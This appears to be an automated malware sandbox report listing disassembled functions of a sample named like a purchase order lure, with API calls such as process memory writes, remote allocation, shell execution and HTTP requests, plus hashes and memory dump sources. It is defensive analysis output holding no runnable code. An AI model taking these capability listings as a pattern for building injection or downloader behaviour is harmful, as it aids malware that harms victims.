                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  APIs
                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                  Similarity
                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                  • String ID:
                                  • API String ID: 3741023627-0
                                  APIs
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroy
                                  • String ID:
                                  • API String ID: 2795845607-0
                                  APIs
                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Similarity
                                  • API ID: DeleteObject$74285CursorDestroyMessageSend
                                  • String ID:
                                  • API String ID: 2326558736-0
                                  APIs
                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                  • 74285CF0.USER32(?), ref: 00455728
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroyInvalidateRect
                                  • String ID:
                                  • API String ID: 3424818771-0
                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: )$U$\
                                  • API String ID: 0-3705770531
                                  APIs
                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                  • CoUninitialize.OLE32 ref: 0046E53D
                                  Strings
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 886957087-24824748
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  Strings
                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                  Similarity
                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                  • API String ID: 708495834-557222456
                                  APIs
                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                  • CoUninitialize.OLE32 ref: 0047863C
                                  Strings
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 886957087-24824748
                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \$]$h
                                  • API String ID: 4104443479-3262404753
                                  • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                  • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                  • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                  • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                  APIs
                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                  • String ID: <$@
                                  • API String ID: 2417854910-1426351568
                                  • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                  • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                  APIs
                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                  • String ID:
                                  • API String ID: 3705125965-3916222277
                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                  APIs
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem
                                  • String ID: 0
                                  • API String ID: 135850232-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  APIs
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                  • 742845F0.USER32(?,000000F0), ref: 0045087D
                                  • 742859E0.USER32(?,000000F0,00000000,?,000000F0), ref: 0045088E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 742845742859Window
                                  • String ID: SysTreeView32
                                  • API String ID: 2921398790-1698111956
                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  APIs
                                  • 74285CF0.USER32(00000000), ref: 00450A2F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285
                                  • String ID: msctls_updown32
                                  • API String ID: 3433674075-2298589950
                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: $<
                                  • API String ID: 4104443479-428540627
                                  • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                  • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                  • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                  • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
